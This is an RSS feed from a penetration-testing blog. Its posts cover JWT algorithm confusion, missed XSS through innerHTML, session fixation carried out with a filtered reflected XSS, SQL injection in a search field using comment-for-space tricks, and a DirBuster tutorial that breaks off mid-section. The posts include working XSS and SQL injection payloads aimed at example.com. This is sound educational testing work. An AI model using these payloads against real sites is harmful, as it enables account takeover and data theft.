<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Explore Security &#187; web apps</title>
	<atom:link href="https://www.exploresecurity.com/tag/web-apps/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.exploresecurity.com</link>
	<description>IT security tools, techniques and commentary</description>
	<lastBuildDate>Wed, 15 Jun 2022 09:21:02 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.6.1</generator>
		<item>
		<title>JWT Attack Walk-Through</title>
		<link>https://www.exploresecurity.com/jwt-attack-walk-through/</link>
		<comments>https://www.exploresecurity.com/jwt-attack-walk-through/#comments</comments>
		<pubDate>Fri, 25 Jan 2019 10:13:31 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[JWT]]></category>
		<category><![CDATA[OpenSSL]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=455</guid>
		<description><![CDATA[Over on the NCC Group website I published a solution to an open demonstration of the well-known JSON Web Token (JWT) algorithm confusion vulnerability (the one where you swap the token algorithm from &#8216;RS&#8217; to &#8216;HS&#8217; and sign your payload with the public key). I use OpenSSL to gain full visibility of what&#8217;s happening and, [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Over on the NCC Group website I <a href="https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/january/jwt-attack-walk-through/">published</a> a solution to an open demonstration of the well-known JSON Web Token (JWT) algorithm confusion vulnerability (the one where you swap the token algorithm from &#8216;RS&#8217; to &#8216;HS&#8217; and sign your payload with the <em>public</em> key). I use OpenSSL to gain full visibility of what&#8217;s happening and, by walking through the method, if you ever need to test this vulnerability yourself, it will hopefully help to avoid false negatives.</p>
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/jwt-attack-walk-through/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Missing XSS flaws with innerHTML and jQuery</title>
		<link>https://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/</link>
		<comments>https://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/#comments</comments>
		<pubDate>Wed, 28 Mar 2018 15:11:42 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[jQuery]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=440</guid>
		<description><![CDATA[I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind. [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind.<span id="more-440"></span></p>
<p>These days a typical web app pulls in data from background XHR requests, the responses come back in a data format like JSON, and the data is parsed client-side and inserted into the DOM of the page. This means, of course, that the encoding of the data in the response is not sufficient by itself to know whether there’s a potential XSS risk – it depends how the data is finally encoded when inserted into the page. But consider the following:</p>
<ol>
<li>You enter <code>&lt;script&gt;alert(1)&lt;/script&gt;</code> hoping for a quick and dirty win – nothing</li>
<li>You suspect input validation so you enter something that you hope will pass validation but test encoding, e.g. <code>xss &lt; &gt; test</code></li>
<li>You inspect the page using the browser dev tools and see it has been inserted as <code>xss &amp;lt; &amp;gt; test</code></li>
<li>So the encoding looks good, and you move on -</li>
</ol>
<p>But wait! Even dangerous DOM manipulation can perform encoding in a text context. For example, <code>innerHTML</code> will observe the <a href="https://w3c.github.io/DOM-Parsing/#xml-serializing-a-text-node">rules</a> and, in a text context, will encode <code>&lt;</code> as <code>&amp;lt;</code> and <code>&gt;</code> as <code>&amp;gt;</code> (and <code>&amp;</code> as <code>&amp;amp;</code> in fact), otherwise those characters are inserted/parsed literally. So the encoding seen in step 3 could be explained by this, meaning that the potential for XSS still exists. It’s precisely because jQuery uses <code>innerHTML</code> as part of functions like <a href="http://api.jquery.com/append/"><em>append()</em></a> that the documentation is full of caveats about not using data from &#8220;untrusted sources&#8221;.</p>
<p>Let’s assume the developers haven’t thought about XSS at all. So why did step 1 fail? This is because the <a href="https://www.w3.org/TR/2008/WD-html5-20080610/dom.html#innerhtml0">spec</a> says &#8220;script elements inserted using <code>innerHTML</code> do not execute when they are inserted&#8221;. If the first test case had been <code>&lt;img src=x onerror=alert(1)&gt;</code> the XSS would have been revealed in step 1.</p>
<p>Hope that’s of some use!</p>
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>When HTML Encoding Helped XSS</title>
		<link>https://www.exploresecurity.com/when-html-encoding-helped-xss/</link>
		<comments>https://www.exploresecurity.com/when-html-encoding-helped-xss/#comments</comments>
		<pubDate>Fri, 30 Jan 2015 10:19:17 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=342</guid>
		<description><![CDATA[Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I previously explained and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I <a href="http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/">previously explained</a> and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a working XSS payload!<span id="more-342"></span></p>
<h3>The problem</h3>
<p>The application used a bespoke session management cookie. I&#8217;ll call it MYSESSIONID. On login, it wasn&#8217;t renewed. I couldn&#8217;t push a session cookie onto the victim in a classic session fixation attack. However, I had XSS in an unauthenticated page &#8211; but not the login page. The filtering in place used a combination of removal and encoding. Characters that were stripped out included:</p>
<p><code>+ ; ( ) ? &lt; &gt;</code></p>
<p>Characters that were allowed included:</p>
<p><code>" ' = [ ] / , .</code></p>
<p>So even though MYSESSIONID wasn&#8217;t protected with the <em>HttpOnly</em> flag, I just couldn&#8217;t construct a payload to steal it. Instead I looked to set one of my own. Here&#8217;s a breakdown of the attack:</p>
<h3>1. Get a valid cookie</h3>
<p>The application did not accept arbitrary session management cookies so the attacker sends a request to get a valid one. In this case, simply having no MYSESSIONID wasn&#8217;t enough, the cookie had to be present but an invalid value did the trick:</p>
<p><code>Cookie: MYSESSIONID=aaaaaaaaaaaaaaaaaaa:xx01</code></p>
<p>returned</p>
<p><code>Set-Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01; Path=/; Domain=.example.com</code></p>
<h3>2. The XSS</h3>
<p>The malicious link looked something like this (the highlighted bits are explained below):</p>
<p><code>https://www.example.com/app/folder/page?vuln=foo"<span style="color: red;">%0a</span>document.cookie%3d"MYSESSIONID%3dNDnQrZ6JsMHyJTBCw8n:xx01<span style="color: blue;">:%0d</span><span style="color: red;">path%3d/app/</span></code></p>
<p>When clicked, the XSS flaw wrote the following to the return page inside a JavaScript code block:</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/";</code></p>
<p>The <span style="color: red;">%0a</span> at the front of the XSS payload was used to start a new line and this was sufficient to act as a statement terminator after <code>var a = "foo"</code> (semi-colons were being stripped). But in order to inject a <code>path</code> attribute (discussed below) I did need a semi-colon in the cookie string. By running every character through a Burp Intruder attack, I saw which characters were allowed, which were stripped and which were returned encoded. By inserting <span style="color: blue;">:%0d</span> into the XSS payload :&amp;#13; was returned &#8211; yes, %0d was encoded but %0a (used above) came back fine! Being inside a string inside a JavaScript block &amp;#13; wasn&#8217;t seen as an HTML entity by the browser and thus wasn&#8217;t interpreted. This provided the semi-colon needed to create a <code>path</code> attribute.</p>
<p>The colon at the front was used because it looked like the session cookie was delimited in that way. That &#8220;xx01&#8243; might refer, for example, to an internal server for load-balancing. Anyway, whatever it did, the application tolerated the unusual suffix to the session cookie. So that explains the :%0d appended to the cookie value in the XSS payload. Now for the <code><span style="color: red;">path%3d/app/</span></code>&#8230;</p>
<h3>3. The victim logins in</h3>
<p>So, at this point, the attacker has set the MYSESSIONID cookie on the victim to be <code>NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13</code> via a reflected XSS attack. Now the victim goes to the login page at https://www.example.com/app/login or is bounced there by navigating to a part of the site that enforces authentication. At login two MYSESSIONID cookies are passed up. This is because one had been set earlier in a <code>Set-Cookie</code> response header the first time the victim hit the site, even if that was by visiting the XSS&#8217;ed page. The genuine MYSESSIONID has a <code>path</code> of / and a <code>domain</code> of .example.com. If I had set a cookie by XSS with no attributes my cookie would have had a <code>path</code> of /app/folder/ (to match the path of the page which set the cookie) and a <code>domain</code> of www.example.com (to match the domain of said page). This would mean my cookie would never be sent up to /app/login for authentication, hence the need to set a <code>path</code> as part of the XSS.</p>
<p>Furthermore, when two MYSESSIONID values were sent up, the application took the first value so I had to make sure my cookie was first. By setting a <code>path</code> of /app/, it trumped the real MYSESSIONID for having a better path match to /app/login. Thus it was listed first in the POST request with the credentials and became authenticated:</p>
<p><code>Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13; MYSESSIONID=4GRc4jiKNeQIfsqh2:xx01</code></p>
<p>In contrast, the <code>domain</code> of a cookie does not govern precedence in a standardised way, it varies between browser. From memory I think my cookie (with a more specific domain match) was sent up first by IE but second by Chrome and Firefox. It&#8217;s not something you want to rely on. Neither could I overwrite the cookie because for that to happen the name, path and domain must match. That would mean having to change both attributes from their defaults but in this case I could only change one. This is because I&#8217;d need a second semi-colon to set a second attribute and in doing so, using the encoding trick above, the first attribute would be spoilt, e.g. I&#8217;d get</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/<span style="color: red;">&amp;#13</span>;domain=.example.com";</code></p>
<p>Developing this proof-of-concept for this specific injection point was quite fiddly and took some persistence but it was worth it. For all of their filtering &#8211; and because they did not change the session cookie after authentication &#8211; this was a nice practical attack using an unauthenticated XSS. One take-away thought then: be sure to probe the XSS defences in full because you never know what might come back and how it could be of help!</p>
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/when-html-encoding-helped-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>SQL Injection in Search Fields</title>
		<link>https://www.exploresecurity.com/sql-injection-in-search-fields/</link>
		<comments>https://www.exploresecurity.com/sql-injection-in-search-fields/#comments</comments>
		<pubDate>Thu, 25 Sep 2014 22:07:40 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=234</guid>
		<description><![CDATA[A quick posting about a fun SQL injection I cracked last week (of course, it&#8217;s only when you&#8217;ve cracked them that they&#8217;re fun!). A colleague had found the classic sign of a problem &#8211; add a single quote and you get an error &#8211; but was having no luck doing anything more. I was getting [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>A quick posting about a fun SQL injection I cracked last week (of course, it&#8217;s only when you&#8217;ve cracked them that they&#8217;re fun!). A colleague had found the classic sign of a problem &#8211; add a single quote and you get an error &#8211; but was having no luck doing anything more. I was getting nowhere with my test so I thought I&#8217;d take a look for a change of scene. The input field was in a search box so, for example, <code>search=keyword'</code> returned an error but <code>search=keyword''</code> was fine. Anything more exciting than that, however, such as <code>search=keyword' and '1'='1</code>, didn&#8217;t seem to work as expected: in this case, an error was returned instead of the same set of results that the normal <code>search=keyword</code> produced.<span id="more-234"></span></p>
<p>The first thing I did was to try to terminate the query as simply as possible with no funny business. So in went <code>search=keyword'--</code> but back came an error. It turned out that the injection point was inside a doubly nested query as <code>search=keyword'))--</code> worked, producing the same results as <code>search=keyword</code>. After a bit of faffing about it occurred to me that spaces might be the issue. So I tried <code>search=keyword'and'1'='1</code> (no spaces in there) and it worked! No error was returned &#8211; but it didn&#8217;t produce the same results as <code>search=keyword</code>, it returned no results at all. What produced the same results as <code>search=keyword</code> was <code>search=keyword'or'1'='1</code>. Okay, park that for now. I had found the main problem &#8211; and it was immediately clear what was going on.</p>
<p>With a developer&#8217;s hat on, what would you do if a user ran a search with multiple keywords? The obvious answer would be to split up the search terms with space as a delimiter, run a query on each one and then return all the results together. If that was true then <code>search=keyword' and '1'='1</code> was running a database query against three terms: <code>keyword'</code>, <code>and</code>, <code>'1'='1</code>. The first of these would fail (just like <code>search=keyword'</code> did), as would the last if it got that far. So next I tried <code>search=keyword'/**/and/**/'1'='1</code> using the inline SQL comment characters and got the same result. Again, using AND returned no results but using OR was like a normal query with <code>search=keyword</code>. I had seen this kind of behaviour once before but I couldn&#8217;t remember what the context was, which is why I&#8217;ve written it down this time!</p>
<h3>AND vs OR</h3>
<p>In general, AND within a SQL statement (and thus in SQL injection too) is restrictive, narrowing the result set, whereas OR is inclusive, widening the result set. But, as with all SQL injection, it all depends on the underlying query. So what could be happening here?</p>
<p>Again, with the developer hat on, what else might you do with a user&#8217;s search terms? Well, it would be nice if you searched a little more widely, using them as stubs. In fact some of the SQL errors were giving this away (thanks, guys): <em>Incorrect syntax near &#8216;%&#8217;</em>. The % character is, of course, a wildcard used with LIKE. So when I searched for <code>keyword</code>, somewhere in the resulting query was <code>LIKE '%keyword%'</code>. This perfectly explains the AND vs OR behaviour&#8230;</p>
<p>When I injected <code>search=keyword'and'1'='1</code> the resulting query included <code>LIKE '%keyword'and'1'='1%'</code>. So the AND clause I&#8217;d added was always evaluating to FALSE and hence no results were returned. Whereas injecting <code>search=keyword'or'1'='1</code> produced <code>LIKE '%keyword'or'1'='1%'</code>. Even though one half of the OR clause was evaluating to FALSE, overall it returned TRUE when I got a positive hit on the keyword.</p>
<p>Since the injection point was inside a doubly nested query and this was a black box test, I had no idea what the real query was, but this certainly made sense. I tried a few more injections to test the theory just for the hell of it:</p>
<ol>
<li>When I terminated the statement, AND and OR did their &#8220;usual&#8221; thing. Which is to say that <code>search=keyword'/**/and/**/1=1))--</code> produced the same result as <code>search=keyword</code> whereas <code>keyword'/**/or/**/1=1))--</code> produced lots of results. This is because I was now commenting out the final % along with the rest of the statement.</li>
<li>When I injected <code>search=keyword'and'1%'='1</code> I got the same results as if there had been no injection. This was the real proof. Now the resulting query would have included <code>LIKE '%keyword'and'1%'='1%'</code> so my AND clause evaluated to TRUE when I got a positive hit on the keyword.</li>
<li>Finally, for what it was worth, <code>search=word'and'1%'='1</code> produced the same result, showing that a % preceded the injection point.</li>
</ol>
<h3>sqlmap</h3>
<p>One of the things that makes a great tool is the ability to customise it for a particular attack scenario. And sqlmap offers that in abundance. In this case a &#8220;tamper&#8221; script, which transforms the payloads in some way, worked a treat. One of the built-in tamper scripts is &#8220;space2comment&#8221; &#8211; bingo! In fact running sqlmap with this script allowed it to find the injection point. Without the script, though, sqlmap would have been stuck because, to quote the <a href='https://github.com/sqlmapproject/sqlmap/wiki/Usage#tamper-injection-data'>wiki page</a>, &#8220;sqlmap itself does no obfuscation of the payload sent, except for strings between single quotes replaced by their CHAR()-alike representation&#8221;.</p>
<p>All this was a good reminder that, when things are getting tough, thinking like a developer can help to turn near-misses into exploitable flaws. Having said that, I&#8217;ve seen code in the past that I could never have guessed, when it was clear the developer wasn&#8217;t thinking at all!</p>
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/sql-injection-in-search-fields/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Session Fixation and XSS Working Hand-in-Hand</title>
		<link>https://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/</link>
		<comments>https://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/#comments</comments>
		<pubDate>Sat, 06 Sep 2014 22:05:41 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[Cookies]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=212</guid>
		<description><![CDATA[Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such scenario because usually a few requirements must be met for the attack to work. I thought I&#8217;d write up a recent session fixation flaw because the act of forcing the cookie onto the victim involved a little twist on overwriting session cookies that made a reflective XSS attack last a lot longer while also laughing in the face of <code>httponly</code>.<span id="more-212"></span></p>
<p>As long as an attacker can remotely force the victim to use a known session cookie that becomes authenticated, you&#8217;ve found session fixation, but it&#8217;s one of those flaws that can be achieved in multiple ways that are subtly different from one another. In this particular instance the session fixation attack ran like this:</p>
<h3>1. The attacker makes up a session cookie</h3>
<p>Yes, the application accepted client-generated cookies.</p>
<h3>2. The attacker makes a specific request using the fabricated cookie</h3>
<p>This was a bit odd but if the session cookie from a request was not recognised by the application (whether it was made up or, more usually, it had just been set by the previous response page) then a background XHR request was made that effectively &#8220;authorised&#8221; the cookie. Okay, whatever, so the attacker does this.</p>
<h3>3. The login page suffered from XSS so the attacker crafts a malicious link to set the known cookie on the victim.</h3>
<p>The malicious link was something like this (I&#8217;ve removed the URL-encoding to make it easier to read):</p>
<p style="padding-left: 30px;"><code>https://www.example.com/login?param="&gt;&lt;script&gt;document.cookie="PHPSESSID=attackerCookie; path=/login; expires=Tue, 06-Aug-2024 00:00:01 GMT"&lt;/script&gt;</code></p>
<p>In more &#8220;traditional&#8221; session fixation the attacker&#8217;s cookie is a parameter in the request that the attacker tricks the victim into making, so using XSS seems a bit like cheating. Unfortunately (for me) the application didn&#8217;t accept a session cookie in the &#8220;traditional&#8221; way and XSS was my only option. OWASP does credit XSS in its description of <a href="https://www.owasp.org/index.php/Session_fixation">session fixation</a> but, that aside, not only did XSS help the session fixation attack but the session fixation flaw helped the XSS attack&#8230;One reason for this was that a simple <code>document.cookie</code> session hijack through XSS was restricted by the response to the above request:</p>
<p style="padding-left: 30px;"><code>Set-Cookie: PHPSESSID=serverCookie; path=/; secure; HttpOnly</code></p>
<p>Because of the <code>httponly</code> flag, the XSS payload could not pull out the session cookie and send it to the attacker. Of course, many other interesting XSS options are still possible, such as rewriting the form&#8217;s <code>action</code> attribute so that the login credentials would be sent to the attacker. However, one advantage of the session fixation approach (apart from the interest of seeing it working) is that <em>nothing</em> is sent to the attacker. Furthermore, as I&#8217;ll explain later (and you may have already spotted from the XSS payload) this attack has the potential to be more long-term than knowing the username and password.</p>
<p>The <code>httponly</code> flag has another effect: the XSS payload can neither read it nor overwrite it. This behaviour isn&#8217;t standardised, it&#8217;s one of those grey areas that Michal Zalewski covers <a href="https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_cookies">so</a> <a href="http://lcamtuf.coredump.cx/tangled/">well</a> but in this case it&#8217;s not so grey. IE 10, Chrome 37 and Firefox 30 all behaved in the same way. But you might have noticed that the XSS payload included a <code>path</code> of /login when it set the session cookie. This is where the attacker wins as now the browser doesn&#8217;t see this as an overwrite but as a different cookie altogether&#8230;</p>
<h3>4. The victim logs in and the session cookie becomes authenticated</h3>
<p>The server-generated session cookie included a <code>path=/</code> directive so when the victim logs in to /login the attacker&#8217;s cookie has precedence (in that it&#8217;s listed first) because the path is a more specific match to the target page:</p>
<p style="padding-left: 30px;"><code>Cookie: PHPSESSID=attackerCookie; PHPSESSID=serverCookie</code></p>
<p>The application processed the first cookie with the login, thus the attacker&#8217;s fabricated cookie became authenticated and was associated with the victim&#8217;s account. Of course if the session cookie had been changed after authentication, which is best practice, the attack would have failed. Note that the attacker can also set the <code>domain</code> attribute of the cookie to .example.com to try to widen the impact of the attack.</p>
<h3>5. The attacker uses the known session cookie to masquerade as the victim</h3>
<p>The last thing to mention is the long-term nature of this attack. Although logging off did detach the session cookie from the victim&#8217;s account, leaving it unauthenticated, the application did not clear it (again, best practice). So the next time the website is visited, the attacker&#8217;s session cookie will again be offered, accepted and authenticated. Because the XSS payload effectively makes the cookie permanent by setting a long expiry date, the attacker has access to the account of anyone that logs in using the compromised browser in the future. Of course, the persistence of the attack dies as soon as the browser&#8217;s cookie cache is cleared &#8211; but how often does that happen? For what is, after all, a <em>reflected</em> XSS attack, you&#8217;d be certain to get a good return. Indeed, if the browser is shared among users (e.g. at home or at internet kiosks), a single XSS attack can exploit multiple users of the website, making it a one-to-many attack, which you don&#8217;t tend to associate with reflective XSS.</p>
<p>I&#8217;m not claiming any of this is particularly novel, by the way. I just enjoyed finding the XSS path trick for myself and using it with session fixation to poke fun at <code>httponly</code> and to create a more persistent version of a reflective XSS attack. It also demonstrated that best practice points, although seemingly trivial when taken alone, can help to stop or mitigate more complex attacks.</p>
]]></content:encoded>
			<wfw:commentRss>https://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Three Cheers for DirBuster</title>
		<link>https://www.exploresecurity.com/three-cheers-for-dirbuster/</link>
		<comments>https://www.exploresecurity.com/three-cheers-for-dirbuster/#comments</comments>
		<pubDate>Fri, 04 Jul 2014 09:29:23 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[DirBuster]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=183</guid>
		<description><![CDATA[Not exactly wizard stuff today, more like back to basics perhaps &#8211; but sometimes they&#8217;re worth revisiting. I&#8217;ve had some good DirBuster finds three tests in a row so I thought I&#8217;d write them up as a case study. It&#8217;s a reminder that there&#8217;s some very low-hanging fruit out there that may not always get [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Not exactly wizard stuff today, more like back to basics perhaps &#8211; but sometimes they&#8217;re worth revisiting. I&#8217;ve had some good DirBuster finds three tests in a row so I thought I&#8217;d write them up as a case study. It&#8217;s a reminder that there&#8217;s some very low-hanging fruit out there that may not always get picked. I&#8217;ve also put together a walk-through for many of DirBuster&#8217;s features and I aim to show that, as with many tools, a few minutes of manual work can produce a faster set of more meaningful results.<span id="more-183"></span></p>
<p>If you know what DirBuster is then you can skip this paragraph. If you don&#8217;t, then DirBuster is designed to brute-force directory and file names on web servers, the point being to find content to which there are no links. It&#8217;s an <a href="https://www.owasp.org/index.php/About_OWASP">OWASP</a> project and you can find it <a href="https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project">here</a>. While you can run it in a pure brute-force mode, you&#8217;ll most likely be using a dictionary to maximise your chances of finding something in the time available. DirBuster comes with a set of dictionaries that were generated by crawling the internet for real directory and file names.</p>
<h2>Cheer number 1</h2>
<p>On a test of a web portal DirBuster found pages at <code>/users/</code> and <code>/organisations/</code>. The portal was a closed system used by the owner to exchange financial information with many other organisations in (what was supposed to be) an isolated way. Sorry to be vague but you understand why! Navigating to <code>/users/</code> opened up a whole user management area, with full names, email addresses, roles, last login etc. At <code>/organisations/</code> there was an organisation management area, from where you could access the same user details from other organisations. Oops. While unauthorised data access was possible, attempts to execute administrative functions failed &#8211; but the fact that these functions were exposed was useful in itself because there was no CSRF protection. Moreover it was simple to target an administrator (of any organisation) because you could look them up from the user listings. The only saving grace was that you had to be authenticated &#8211; a point I&#8217;ll return to later.</p>
<h2>Cheer number 2</h2>
<p>On a public website for a high-street company, DirBuster found the page <code>/staff/</code>. This revealed a staff discount page where you could go through and order stuff at significant discounts, meaning lost revenue to the client. Of course, this sort of thing has a habit of getting out on to discount sites and the like. The page was available unauthenticated (although since anyone could register for an account, that&#8217;s by the bye).</p>
<p>Cheer number 2½: DirBuster also found a page that had a special offer for readers of a particular publication. Not as important this one since it was obviously there for the taking but it clearly wasn&#8217;t designed to be available to all.</p>
<h2>Cheer number 3</h2>
<p>On a test of a web portal, while authenticated, DirBuster found a positive response from <code>/admin</code>. This turned out to be an authorisation flaw and a short time later, after some fuzzing of user IDs, I had some 2,300 usernames and email addresses as well as plaintext passwords for about a third of those accounts. This portal was used by many different organisations &#8211; and a user from one of them could log in to another user&#8217;s account from another organisation. Oops.</p>
<p>In fact I had a fourth cheer yesterday, where I found a page that allowed me to self-register unauthenticated on (what was supposed to be) a <em>closed</em> site! But &#8220;four cheers for DirBuster&#8221; sounds a bit naff.</p>
<h2>Walk-through</h2>
<p>The rest (and majority) of this article is a walk-through of the main DirBuster configuration options. <em><span style="text-decoration: underline;">Note</span> that I&#8217;m describing a general case in what follows and obviously there may be times when you need to do things differently. That&#8217;s an important part of pentesting: adapting your test to suit the target</em>. Having said that, let&#8217;s take a look at the starting screen (of version 1.0 RC1, on which this article is based):</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-main-screen.png"><img class="aligncenter size-full wp-image-188" alt="DirBuster main screen" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-main-screen.png" width="769" height="589" /></a></p>
<h3>Target URL</h3>
<p>For the &#8220;Target URL&#8221; consider HTTP vs HTTPS. HTTP is obviously faster but a website will often redirect some or all requests to the HTTPS equivalent whether the page is actually there or not, which will spoil your results. You can enable &#8220;Follow Redirects&#8221; from the Options menu but that&#8217;s a considerable overhead if it&#8217;s happening with every request. If the redirect happens only when the page exists then a HTTP-based scan should be speedier. My personal preference is that if the site is happy delivering HTTP pages over HTTPS, which is normal, I&#8217;ll go for HTTPS. Despite the overhead slowing down the request rate, it does tend to rule out excessive redirects since it would be unusual for a HTTPS request to be redirected to a HTTP equivalent. Redirects may also confuse the &#8220;fail case&#8221;, which DirBuster uses to decide how it knows whether or not a guess is correct, which could lead to false negatives as well as false positives. More on this later.</p>
<p>A similar situation may arise with the <em>domain</em> in that <span style="text-decoration: underline;">https://site.com/page</span> may always redirect to <span style="text-decoration: underline;">https://<strong>www</strong>.site.com/page</span> so use <span style="text-decoration: underline;">https://www.site.com:443</span> as your base URL.</p>
<h3>Work Method</h3>
<p>The default &#8220;Auto Switch&#8221; mode is probably best for the majority of cases. DirBuster will first try to see if it can get sensible results from HEAD requests, the reason being that the responses will be smaller. Even though it makes a GET request on 200 responses, this will save time when the 404 message (or equivalent) is relatively large. On the site I was looking at when writing this bit, the full HTML 404 response was about 19kB bigger than the disembodied 404 set of headers you&#8217;d get with HEAD. A crude bit of testing showed this took on average twice as long to arrive and be processed, adding 200ms to the response time. Given that you&#8217;re getting 404s most of the time this could mean a saving, even with the small dictionary, of over 1.4 gigabytes or 4 hours of waiting!</p>
<h3>Number Of Threads</h3>
<p>Running DirBuster with a high number of threads can slow down the target server, which may not go down too well if you&#8217;re testing a live site. You&#8217;ll probably find the default (10) to be a little over-enthusiastic, especially as you&#8217;ll be running other tests simultaneously. If you examine the number of threads in the DirBuster process (javaw.exe) while it&#8217;s running, you&#8217;ll see it jump up by more than the number you set in this field. I haven&#8217;t looked at the source code but I&#8217;m assuming that DirBuster is indeed honouring this field. I imagine that the &#8220;number of threads&#8221; refers to &#8220;Workers&#8221; that handle the actual requests and responses over the network while the other threads, for example, manage different queues depending on what you tick at the bottom of the screen.</p>
<p><span style="line-height: 1.714285714; font-size: 1rem;">As an aside, I&#8217;ve noticed that when you run a number of scans without re-starting DirBuster, the number of threads at rest tends to increase. I&#8217;m not sure if this is an issue that could degrade performance but just bear it in mind. </span><span style="line-height: 1.714285714; font-size: 1rem;">(I did try to contact the project lead, James Fisher, to ask about threading but I got no reply. And it&#8217;s not that big a deal to warrant rummaging through the source code!)</span></p>
<p>I have DirBuster running on another monitor so I can keep an eye on the requests per second and any sudden scrolling, which usually means errors! Bear in mind that, say, 20 requests per second over HTTP<strong>S</strong> will be working the server harder than 20 requests per second over HTTP. A nice feature is that once the scan is running, you can dynamically change the number of threads.</p>
<h3>Dictionary</h3>
